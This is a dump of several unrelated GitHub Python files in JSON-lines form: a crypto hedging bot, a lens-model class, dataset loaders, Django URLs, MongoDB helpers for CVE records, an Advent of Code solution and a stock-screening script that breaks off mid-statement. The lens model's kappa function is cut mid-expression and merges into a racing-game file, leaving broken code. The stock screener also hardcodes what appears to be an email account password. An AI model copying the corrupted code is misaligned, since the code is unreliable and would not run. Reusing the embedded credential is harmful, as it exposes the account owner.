digits(mount/buyprice,4)\r\n        sellmount = digits(mount/sellprice,4)\r\n        cm1 = api.create_order_cmd(1, symbol, CONST.SIDE_BUY, CONST.TYPE_LIMIT_PRICE, buyprice, buymount, 0)\r\n        cm2 = api.create_order_cmd(2, symbol, CONST.SIDE_SELL, CONST.TYPE_LIMIT_PRICE, sellprice, sellmount, 0)\r\n        success, r = api.multi_sign_cmd([cm1, cm2])\r\n        log.logger.info(\"debug info:\")\r\n        log.logger.info(r)\r\n        if success:\r\n            try:\r\n                ordersellid = r['result'][0]['result']\r\n                ordersellindex = r['result'][0]['index']\r\n                orderbuyid = r['result'][1]['result']\r\n                orderbuyindex = r['result'][1]['index']\r\n                # debug\r\n                #print(\"sell_price\", sellprice, \"sell_mount\", sellmount,\"sell_orderid\",ordersellid)\r\n                #log.logger.info(\"sell_price\"+str(sellprice)+\"sell_mount\"+str(sellmount)+\"sell_orderid\"+str(ordersellid))\r\n                #print(\"buy_price\", buyprice, \"buy_mount\", buymount,\"buy_orderid\",orderbuyid)\r\n                #log.logger.info(\"buy_price\"+str(buyprice) + \"buy_mount\"+str(buymount)+\"buy_orderid\"+str(orderbuyid))\r\n\r\n            except KeyError:\r\n                pass\r\n            try:\r\n                # check whether the orders completed\r\n                if orderjust(orderbuyid) == False:\r\n                    print(orderbuyid)\r\n                    ordercancle(orderbuyindex,orderbuyid)\r\n                else:\r\n                    log.logger.info(\"buy order filled\")\r\n                if orderjust(ordersellid) == False:\r\n                    print(ordersellid)\r\n                    ordercancle(ordersellindex,ordersellid)\r\n                else:\r\n                    log.logger.info(\"sell order filled\")\r\n                log.logger.info(\"closing log:\")\r\n                log.logger.info(r)\r\n            except UnboundLocalError:\r\n                pass\r\n        else:\r\n            log.logger.info(r)\r\nschedule.every(1).seconds.do(handler)\r\nlog.logger.info(\"trading pair:\")\r\nlog.logger.info(symbol)\r\nlog.logger.info(\"USDT spent per hedge:\")\r\nlog.logger.info(mount)\r\nwhile True:\r\n    #log.logger.info(\"USDT balance: \"+getusdt())\r\n    schedule.run_pending()\r\n    
time.sleep(2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Kaneki-x/coinpark","sub_path":"CPbot.py","file_name":"CPbot.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743291352","text":"import numpy as np\nfrom MagniPy.util import *\nfrom MagniPy.MassModels.ExternalShear import Shear\n\nclass SIE:\n\n def __init__(self):\n \"\"\"\n adopting a standard cosmology, other cosmologies not yet implemented\n :param z1: lens redshift\n :param z2: source redshift\n :param h: little h\n \"\"\"\n self.Shear = Shear()\n\n def def_angle(self, x, y, theta_E, q, phi_G, center_x=0, center_y=0, gamma=2,shear=None,shear_theta=None):\n\n if gamma!=2:\n raise Exception('only isothermal (gamma=2) models allowed')\n return\n\n xloc = x - center_x\n yloc = y - center_y\n\n phi_G *= -1\n phi_G += -0.5*np.pi\n\n shearx,sheary = 0,0\n\n if q==1:\n\n r = np.sqrt(xloc ** 2 + yloc ** 2)\n\n magdef = theta_E\n\n return shearx+magdef * xloc * r ** -1 , sheary+magdef * yloc * r ** -1\n\n else:\n\n\n q2 = q * q\n qfac = np.sqrt(1 - q2)\n\n normFac = q * np.sqrt(2 * (1 + q2) ** -1)\n\n theta_E *= normFac ** -1\n\n xrot, yrot = rotate(xloc, yloc, -phi_G)\n psi = np.sqrt(q**2*xrot**2+yrot**2)\n psis = psi\n\n xdef = theta_E * q * qfac ** -1 * np.arctan(qfac * xrot * psis ** -1)\n ydef = theta_E * q * qfac ** -1 * np.arctanh(qfac * yrot * (psi) ** -1)\n\n xdef,ydef = rotate(xdef,ydef,phi_G)\n\n return xdef,ydef\n\n def kappa(self, x, y, theta_E, q, phi_G, center_x=0, center_y=0, gamma=2):\n\n alpha = 3-gamma\n\n r_ellip_square = ((x-center_x)**2 + (y-center_y)**2*q**-2)\n rmin = 1e-9\n try:\n r_ellip_square[np.where(r_ellip_square r[0] - self.p[0]:\n self.result += self.hypot(self.p, r)\n self.p = r\n\n def hypot(self, p0, p1):\n s0 = p0[0] - p1[0]\n s1 = p0[1] - p1[1]\n return math.hypot(s0, s1)\n\n\nRacingGame()\n","repo_name":"kechol/exercise","sub_path":"atcoder/arc001_4/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33099041","text":"from .node import Node\nfrom shapely.geometry import MultiPoint\nfrom src.geom import to_Nd\n\n\ndef delete_between(node, source, target):\n prd = source.edge_to(node)\n suc = target.edge_to(node)\n source.connect_to(target)\n\n node.remove_edge(suc)\n node.remove_edge(prd)\n source.remove_edge(prd)\n target.remove_edge(suc)\n\n\ndef node_at(root, coords):\n for n in root.__iter__():\n if n.geom == coords:\n return n\n\n\ndef geom_merge(*nodes):\n res = []\n ids = set()\n for n in nodes:\n ids.add(n.id)\n res.append(n.as_point)\n mlp_center = MultiPoint(res).centroid\n node = Node(to_Nd(mlp_center))\n\n for n in nodes:\n for ins in n.predecessors(edges=True):\n if ins.other_end(n).id not in ids:\n ins.other_end(n).connect_to(node)\n n.remove_edge(ins)\n ins.other_end(n).remove_edge(ins)\n del ins\n for ins in n.successors(edges=True):\n if ins.other_end(n).id not in ids:\n node.connect_to(ins.other_end(n))\n n.remove_edge(ins)\n ins.other_end(n).remove_edge(ins)\n del ins\n for n in nodes:\n del n\n return node\n\n\n# def apply_ppg(node):\n\n\n","repo_name":"psavine42/viper-server","sub_path":"src/structs/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
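The geom_merge routine in the functional.py record above collapses several graph nodes into a single node placed at the centroid of their points, then rewires the old edges onto it. A minimal, self-contained sketch of just the centroid step, using shapely alone (Node and to_Nd are project-internal and not reproduced here):

from shapely.geometry import MultiPoint

# the centroid of a MultiPoint is the mean of its member points,
# which is where geom_merge places the merged node
pts = [(0.0, 0.0), (2.0, 0.0), (1.0, 3.0)]
center = MultiPoint(pts).centroid
print(center.x, center.y)  # 1.0 1.0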
+{"seq_id":"19804104080","text":"import os\nimport numpy as np\nimport cv2\n\nfrom blueprint.ml import Dataset, Split\n\n\nclass WFLW(Dataset):\n def __init__(self, root, split=Split.ALL, subset='all'):\n self.root = root\n\n anno_file = None\n if split == Split.TRAIN:\n anno_file = 'face_landmarks_wflw_train.csv'\n elif split == Split.TEST:\n if subset == 'all':\n anno_file = 'face_landmarks_wflw_test.csv'\n else:\n anno_file = f'face_landmarks_wflw_test_{subset}.csv'\n\n self.info_list = []\n with open(os.path.join(self.root, anno_file), 'r') as fd:\n fd.readline() # skip the first line\n for line in fd:\n line = line.strip()\n if len(line) == 0:\n continue\n if line.startswith('#'):\n continue\n im_path, scale, center_w, center_h, * \\\n landmarks = line.split(',')\n\n landmarks = np.reshape(\n np.array([float(v) for v in landmarks], dtype=np.float32), [98, 2])\n cx, cy = np.mean(landmarks, axis=0)\n\n sample_name = os.path.splitext(im_path)[0].replace(\n '/', '.') + ('_%.3f_%.3f' % (cx, cy))\n im_path = os.path.join(self.root, 'WFLW_images', im_path)\n\n assert os.path.exists(im_path) \n\n self.info_list.append({\n 'sample_name': sample_name,\n 'im_path': im_path,\n 'landmarks': landmarks,\n 'box_info': (float(scale), float(center_w), float(center_h))\n })\n\n def __len__(self):\n return len(self.info_list)\n\n def __getitem__(self, index):\n info = self.info_list[index]\n image = cv2.cvtColor(cv2.imread(info['im_path']), cv2.COLOR_BGR2RGB)\n scale, center_w, center_h = info['box_info']\n box_half_size = 100.0 * scale\n\n return {\n 'image': image,\n 'box': np.array([center_h-box_half_size, center_w-box_half_size,\n center_h+box_half_size, center_w+box_half_size],\n dtype=np.float32),\n 'landmarks': info['landmarks']\n }\n\n def sample_name(self, index):\n return self.info_list[index]['sample_name']\n","repo_name":"FacePerceiver/FaRL","sub_path":"farl/datasets/wflw.py","file_name":"wflw.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"53"} +{"seq_id":"79262171","text":"from django.urls import path\n\nfrom bookworm.blog.views import BlogListView, ArticleDetailView, ArticleCreateView, ArticleUpdateView, ArticleDeleteView\n\nurlpatterns = [\n\tpath('', BlogListView.as_view(), name='blog'),\n\tpath('article//', ArticleDetailView.as_view(), name='article'),\n\tpath('create-article/', ArticleCreateView.as_view(), name='create article'),\n\tpath('update-article//', ArticleUpdateView.as_view(), name='update article'),\n\tpath('delete-article/', ArticleDeleteView.as_view(), name='delete article'),\n]\n","repo_name":"milenmihaylov/bookstore-project","sub_path":"bookworm/bookworm/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42678599778","text":"from other_imports import *\nfrom configs import AnkaraConfig\n\nclass AnkaraDataset(AnkaraConfig):\n def __init__(self, multispectral = False):\n super(AnkaraDataset, self).__init__()\n \n self.multispectral = multispectral\n self.images_path = self.base_dir + '/Ankara/AnkaraHSIArchive'\n self.labels_path = self.images_path + '/' + 'multilabel.txt'\n \n def load_dataframe(self):\n \n df = pd.read_csv(self.labels_path, delimiter = \"\\t\") \n directories = [x[0] for x in os.walk(self.images_path)][0]\n \n files = glob.glob(os.path.join(directories, '*' + self.extension)) \n df['IMAGE\\LABEL'] = files\n \n if 
self.multispectral:\n df_ms = df.copy()\n files_multispectral = glob.glob(os.path.join(directories, '*' + self.extension_ms))\n df_ms['IMAGE\\LABEL'] = files_multispectral\n df = df_ms\n df = df.loc[df.values[:, 1:].sum(1) != 0]\n \n return df\n \n","repo_name":"marjanstoimchev/RSMLC","sub_path":"datasets/ankara_dataset.py","file_name":"ankara_dataset.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23879072141","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass F1_Loss(nn.Module):\n\tdef __init__(self, num_classes, epsilon=1e-7):\n\t\tsuper().__init__()\n\t\tself.epsilon = epsilon\n\t\tself.num_classes = num_classes\n\n\tdef forward(self, pred, target):\n\t\tassert pred.dim() == 2\n\t\tassert target.dim() == 1\n\n\t\tpred = torch.softmax(pred, dim=1)\n\t\ttarget = F.one_hot(target, self.num_classes).to(torch.float32)\n\n\t\ttp = (target * pred).sum(dim=0).to(torch.float32)\n\t\ttn = ((1 - target) * (1 - pred)).sum(dim=0).to(torch.float32)\n\t\tfp = ((1 - target) * pred).sum(dim=0).to(torch.float32)\n\t\tfn = (target * (1 - pred)).sum(dim=0).to(torch.float32)\n\n\t\tprecision = tp / (tp + fp + self.epsilon)\n\t\trecall = tp / (tp + fn + self.epsilon)\n\n\t\tf1 = 2* (precision*recall) / (precision + recall + self.epsilon)\n\t\tf1 = f1.clamp(min=self.epsilon, max=1-self.epsilon)\n\t\tf1 = 1 - f1.mean()\n\n\t\treturn f1","repo_name":"ad4529/convex_object_detection","sub_path":"fcos_core/layers/f1_loss.py","file_name":"f1_loss.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32964410014","text":"import pymongo\nimport Utils.CVE_Data as cve_data\n\n\ndef connect_mongodb(ip, port):\n return pymongo.MongoClient(ip, int(port))\n\n\ndef upsert_mongodb(mongo_client, cve, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n postid = collection.update_one({'cve.CVE_data_meta.ID' : cve_data.get_cve_id(cve)},\n {\"$set\":{\"cve\" : cve_data.get_cve(cve), \"configurations\" : cve_data.get_configurations(cve), \"impact\" : cve_data.get_impact(cve), \"publishedDate\": cve_data.get_published_date(cve), \"lastModifiedDate\": cve_data.get_last_modified_date(cve)}},\n upsert=True)\n return postid\n\n\ndef find_by_cve(mongo_client, cve_id, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n cve = collection.find_one({\"cve.CVE_data_meta.ID\": cve_id})\n return cve\n\n\ndef find_by_name(mongo_client, name, version, db_name, collection_name):\n db = mongo_client[db_name]\n collection = db[collection_name]\n cve = collection.find_one({\"cve.affects.vendor.vendor_data.product.product_data.product_name\": name})\n return cve\n","repo_name":"MotiElbaz/Vulnerabilities-Scanner","sub_path":"Utils/MongoDB.py","file_name":"MongoDB.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"8508915239","text":"#!/usr/bin/python3\n\nimport argparse\nimport requests\nimport time\nfrom typing import List, Generator\n\nfrom pathlib import Path\n\nimport utils\n\n\nLOCAL_DATA_FILE=Path(\"../data/day3.txt\")\nTEST_DATA_FILE=Path(\"../data/day3_test.txt\")\n\ndef read_binary (line, ctx):\n if \"num_bits\" not in ctx:\n ctx[\"num_bits\"] = len(line)\n ctx[\"bit_counts\"] = [0] * ctx[\"num_bits\"]\n \n for i, bit in 
enumerate(line):\n if bit == \"1\":\n ctx[\"bit_counts\"][i] += 1\n else:\n assert bit == \"0\"\n\n ctx[\"count\"] += 1\n\n return int(line, 2)\n\ndef run_p1 (datafile):\n ctx = {\"count\": 0}\n l = list(utils.read_input(datafile, read_binary, ctx))\n print(ctx)\n gamma = int(\n \"\".join(\"0\" if bit < ctx[\"count\"] // 2 else \"1\"\n for bit in ctx[\"bit_counts\"]),\n 2\n )\n epsilon = int(\n \"\".join(\"1\" if bit < ctx[\"count\"] // 2 else \"0\"\n for bit in ctx[\"bit_counts\"]),\n 2\n )\n\n\n print(gamma, epsilon, gamma * epsilon)\n\n\ndef main ():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--tests',\n action='store_true',\n help='Run tests')\n args = parser.parse_args()\n\n\n if args.tests:\n run_p1(TEST_DATA_FILE)\n else:\n run_p1(LOCAL_DATA_FILE)\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"78thomasd/aoc2021","sub_path":"puzzles/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3182879260","text":"import pandas as pd\nimport datetime\nimport yfinance as yf\nimport email\n\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom datetime import date\nimport statsmodels.api as sm\nimport getFamaFrenchFactors as gff\n\ndf_SMA = pd.DataFrame()\ndf_EMA = pd.DataFrame()\ndf_ADX = pd.DataFrame()\ndf_RSI = pd.DataFrame()\ndf_expected_yearly_return = pd.DataFrame()\n\n# def get_stock_list():\n# # this is the website we're going to scrape from\n# url = \"https://www.malaysiastock.biz/Stock-Screener.aspx\"\n# response = requests.get(url, headers={'User-Agent':'test'})\n# soup = BeautifulSoup(response.content, \"html.parser\")\n# table = soup.find(id = \"MainContent2_tbAllStock\")\n# # return the result (only ticker code) in a list\n# return [stock_code.get('href')[-4:] for stock_code in table.find_all('a')]\n\ncompany_name = []\ncompany_ticker = []\nSMA_screened_list = []\nEMA_screened_list = []\n\n\n# Create a function to scrape the data\n# def scrape_stock_symbols(Letter):\n# Letter = Letter.upper()\n# URL = 'https://www.advfn.com/nyse/newyorkstockexchange.asp?companies='+Letter\n# page = requests.get(URL)\n# soup = BeautifulSoup(page.text, \"html.parser\")\n# odd_rows = soup.find_all('tr', attrs= {'class':'ts0'})\n# even_rows = soup.find_all('tr', attrs= {'class':'ts1'})\n# for i in odd_rows:\n# row = i.find_all('td')\n# company_name.append(row[0].text.strip())\n# company_ticker.append(row[1].text.strip())\n# for i in even_rows:\n# row = i.find_all('td')\n# company_name.append(row[0].text.strip())\n# company_ticker.append(row[1].text.strip())\n# return company_name, company_ticker\n\n\ndef send_email(email_message, email_subject, attachment=None):\n msg = email.message_from_string(\", \".join(email_message))\n msg = MIMEMultipart(\"alternative\")\n msg['From'] = 'xxxxxxx@gmail.com'\n msg['To'] = 'xxxxxxx@gmail.com'\n msg['Subject'] = email_subject\n\n if attachment != None:\n part2 = MIMEText(attachment, \"html\")\n msg.attach(part2)\n\n email_from = 'xxxxxxx@gmail.com'\n email_to = 'xxxxxxx@gmail.com'\n s = smtplib.SMTP(\"smtp.gmail.com\", 587)\n ## for yahoo mail user: s = smtplib.SMTP(\"smtp.mail.yahoo.com\",587)\n ## for hotmail user: s = smtplib.SMTP(\"smtp.live.com\",587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login(email_from, \"ffvyyfbxjxkggllmwv\")\n s.sendmail(email_from, [email_to], msg.as_string())\n s.quit()\n\n\ndef get_stock_price(code):\n # you can 
change the start date\n    start_date = datetime.datetime.now() - datetime.timedelta(days=365) # one year ago\n    data = yf.download(code, start=start_date)\n    return data\n\n\ndef SMA_screener(close, days):\n    return close.rolling(window=days).mean()\n\n\ndef percent_change(close):\n    return close.pct_change()\n\n\ndef add_EMA(price, day):\n    return price.ewm(span=day).mean()\n\n\ndef add_STOCH(close, low, high, period, k, d=0):\n    STOCH_K = ((close - low.rolling(window=period).min()) / (\n        high.rolling(window=period).max() - low.rolling(window=period).min())) * 100\n    STOCH_K = STOCH_K.rolling(window=k).mean()\n    if d == 0:\n        return STOCH_K\n    else:\n        STOCH_D = STOCH_K.rolling(window=d).mean()\n        return STOCH_D\n\n\ndef check_bounce_EMA(df):\n    candle1 = df.iloc[-1]\n    candle2 = df.iloc[-2]\n    cond1 = candle1['EMA18'] > candle1['EMA50'] > candle1['EMA100']\n    cond2 = candle1['STOCH_%K(5,3,3)'] <= 30 or candle1['STOCH_%D(5,3,3)'] <= 30\n    cond3 = candle2['Low'] < candle2['EMA50'] and \\\n            candle2['Close'] > candle2['EMA50'] and \\\n            candle1['Low'] > candle1['EMA50']\n    return cond1 and cond2 and cond3\n\n\ndef get_rsi(Close, lookback):\n    ret = Close.diff()\n    up = []\n    down = []\n\n    for i in range(len(ret)):\n        if ret[i] < 0:\n            up.append(0)\n            down.append(ret[i])\n        else:\n            up.append(ret[i])\n            down.append(0)\n\n    up_series = pd.Series(up)\n    down_series = pd.Series(down).abs()\n\n    up_ewm = up_series.ewm(com=lookback - 1, adjust=False).mean()\n    down_ewm = down_series.ewm(com=lookback - 1, adjust=False).mean()\n\n    rs = up_ewm / down_ewm\n    rsi = 100 - (100 / (1 + rs))\n    rsi_df = pd.DataFrame(rsi).rename(columns={0: 'rsi'}).set_index(Close.index)\n    rsi_df = rsi_df.dropna()\n\n    return rsi_df[3:]\n\ndef get_adx(High, Low, Close, lookback):\n    plus_dm = High.diff()\n    minus_dm = Low.diff()\n    plus_dm[plus_dm < 0] = 0\n    minus_dm[minus_dm > 0] = 0\n\n    tr1 = pd.DataFrame(High - Low)\n    tr2 = pd.DataFrame(abs(High - Close.shift(1)))\n    tr3 = pd.DataFrame(abs(Low - Close.shift(1)))\n    frames = [tr1, tr2, tr3]\n    tr = pd.concat(frames, axis=1, join='inner').max(axis=1)\n    atr = tr.rolling(lookback).mean()\n\n    plus_di = 100 * (plus_dm.ewm(alpha=1 / lookback).mean() / atr)\n    minus_di = abs(100 * (minus_dm.ewm(alpha=1 / lookback).mean() / atr))\n    dx = (abs(plus_di - minus_di) / abs(plus_di + minus_di)) * 100\n    adx = ((dx.shift(1) * (lookback - 1)) + dx) / lookback\n    adx_smooth = adx.ewm(alpha=1 / lookback).mean()\n    return plus_di, minus_di, adx_smooth\n\n#Calculate the On Balance Volume\ndef calc_OBV(close, volume):\n    OBV = []\n    OBV.append(0)\n    for i in range(1, len(close)):\n        if close[i] > close[i-1]: #If the closing price is above the prior close price\n            OBV.append(OBV[-1] + volume[i]) #then: Current OBV = Previous OBV + Current Volume\n        elif close[i] < close[i-1]:\n            OBV.append( OBV[-1] - volume[i])\n        else:\n            OBV.append(OBV[-1])\n    return OBV\n\n#Calculate OBV EMA\ndef calc_obv_ema(obv):\n    #Store the OBV and OBV EMA into new columns\n    return obv.ewm(com=20).mean()\n\ndef get_expected_return(adj_close):\n    ff3_monthly = gff.famaFrench3Factor(frequency='m')\n    ff3_monthly.rename(columns={\"date_ff_factors\": 'Date'}, inplace=True)\n    ff3_monthly.set_index('Date', inplace=True)\n\n    stock_returns = adj_close.resample('M').last().pct_change().dropna()\n    stock_returns.name = \"Month_Rtn\"\n    ff_data = ff3_monthly.merge(stock_returns, on='Date')\n\n    X = ff_data[['Mkt-RF', 'SMB', 'HML']]\n    y = ff_data['Month_Rtn'] - ff_data['RF']\n    X = sm.add_constant(X)\n    ff_model = sm.OLS(y, X).fit()\n    # print(ff_model.summary())\n    intercept, b1, b2, b3 = 
ff_model.params\n\n rf = ff_data['RF'].mean()\n market_premium = ff3_monthly['Mkt-RF'].mean()\n size_premium = ff3_monthly['SMB'].mean()\n value_premium = ff3_monthly['HML'].mean()\n\n expected_monthly_return = rf + b1 * market_premium + b2 * size_premium + b3 * value_premium\n expected_yearly_return = expected_monthly_return * 12\n return(str(expected_yearly_return))\n\n# string.ascii_uppercase\n\n# Loop through every letter in the alphabet to get all of the tickers from the website\n# for char in string.ascii_uppercase:\n# (temp_name,temp_ticker) = scrape_stock_symbols(char)\nstart_time = datetime.datetime.now()\n# ticker_file = open(r\"C:\\Users\\sudhi\\Documents\\Algorithmic_Trading\\NYSE.txt\", \"r\")\n# ticker_list = []\n# for item in ticker_file:\n# ticker = item.split()[0]\n# ticker_list.append(ticker)\n\nticker_list = pd.read_csv(\"stockanalysis_dot_com.csv\")\n\nfor stock_code in ticker_list['ticker']:\n try:\n # Step 1: get stock price for each stock\n price_chart_df = get_stock_price(stock_code)\n\n close = price_chart_df['Close']\n low = price_chart_df['Low']\n open = price_chart_df['Open']\n high = price_chart_df['High']\n volume = price_chart_df['Volume']\n adj_close = price_chart_df['Adj Close']\n\n price_chart_df['SMA_7'] = SMA_screener(close, 7)\n price_chart_df['SMA_7_PCT_CHG'] = price_chart_df['SMA_7'].pct_change()\n price_chart_df['SMA_20'] = SMA_screener(close, 20)\n price_chart_df['SMA_50'] = SMA_screener(close, 50)\n price_chart_df['SMA_200'] = SMA_screener(close, 200)\n price_chart_df['percent_change'] = percent_change(close)\n\n expected_yearly_returns = get_expected_return(adj_close)\n\n df1_expected_yearly_return = {\n 'ticker' : stock_code,\n 'yearly_return' : expected_yearly_returns,\n }\n df_expected_yearly_return = df_expected_yearly_return.append(df1_expected_yearly_return, ignore_index=True)\n\n\n\n\n if price_chart_df['percent_change'].iloc[-1] > 0 \\\n and price_chart_df['SMA_7_PCT_CHG'].iloc[-1] > 0 \\\n and price_chart_df['Close'].iloc[-1] > price_chart_df['SMA_7'].iloc[-1] \\\n and price_chart_df['SMA_7'].iloc[-1] > price_chart_df['SMA_20'].iloc[-1] \\\n and price_chart_df['SMA_20'].iloc[-1] > price_chart_df['SMA_50'].iloc[-1] \\\n and price_chart_df['SMA_50'].iloc[-1] > price_chart_df['SMA_200'].iloc[-1]:\n SMA_screened_list.append(stock_code)\n price_chart_df['EMA18'] = add_EMA(close, 18)\n price_chart_df['EMA50'] = add_EMA(close, 50)\n price_chart_df['EMA100'] = add_EMA(close, 100)\n price_chart_df['STOCH_%K(5,3,3)'] = add_STOCH(close, low,\n high, 5, 3)\n price_chart_df['STOCH_%D(5,3,3)'] = add_STOCH(close, low,\n high, 5, 3, 3)\n\n # calculate standard deviation\n standard_deviation = close.std()\n\n\n price_chart_df['OBV'] = calc_OBV(close, volume)\n price_chart_df['OBV_EMA'] = calc_obv_ema(price_chart_df['OBV'])\n\n # Calculate ADX\n price_chart_df['plus_di'] = pd.DataFrame(\n get_adx(high, low, close, 14)[0]).rename(\n columns={0: 'plus_di'})\n price_chart_df['minus_di'] = pd.DataFrame(\n get_adx(high, low, close, 14)[1]).rename(\n columns={0: 'minus_di'})\n price_chart_df['adx'] = pd.DataFrame(\n get_adx(high, low, close, 14)[2]).rename(\n columns={0: 'adx'})\n\n\n # Calculate RSI\n price_chart_df['rsi_14'] = get_rsi(close, 14)\n\n\n if price_chart_df['adx'].iloc[-1] >= 40:\n df1_ADX = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': 
price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_ADX = df_ADX.append(df1_ADX, ignore_index=True)\n\n\n if price_chart_df['rsi_14'].iloc[-1] <= 35:\n df1_RSI = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_RSI = df_RSI.append(df1_RSI, ignore_index=True)\n\n\n df1_SMA = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 'STOCH_%D(5,3,3)': price_chart_df['STOCH_%D(5,3,3)'].iloc[-1],\n 'RSI_14': price_chart_df['rsi_14'].iloc[-1],\n 'ADX_plus_di' : price_chart_df['plus_di'].iloc[-1],\n 'ADX' : price_chart_df['adx'].iloc[-1],\n 'ADX_minus_di' : price_chart_df['minus_di'].iloc[-1],\n 'OBV' : price_chart_df['OBV'].iloc[-1],\n 'OBV_EMA' : price_chart_df['OBV_EMA'].iloc[-1],\n }\n df_SMA = df_SMA.append(df1_SMA, ignore_index=True)\n\n # if all 3 conditions are met, add stock into screened list\n if check_bounce_EMA(price_chart_df):\n EMA_screened_list.append(stock_code)\n print(EMA_screened_list)\n\n\n \n df1_EMA = {'date' : date.today(),\n 'ticker': stock_code,\n 'Close': price_chart_df['Close'].iloc[-1],\n 'SMA_7': price_chart_df['SMA_7'].iloc[-1],\n 'SMA_7_PCT_CHG': price_chart_df['SMA_7_PCT_CHG'].iloc[-1],\n 'SMA_20': price_chart_df['SMA_20'].iloc[-1],\n 'SMA_50': price_chart_df['SMA_50'].iloc[-1],\n 'SMA_200': price_chart_df['SMA_200'].iloc[-1],\n 'STD': standard_deviation,\n 'EMA18': price_chart_df['EMA18'].iloc[-1],\n 'EMA50': price_chart_df['EMA50'].iloc[-1],\n 'EMA100': price_chart_df['EMA100'].iloc[-1],\n 'STOCH_%K(5,3,3)': price_chart_df['STOCH_%K(5,3,3)'].iloc[-1],\n 
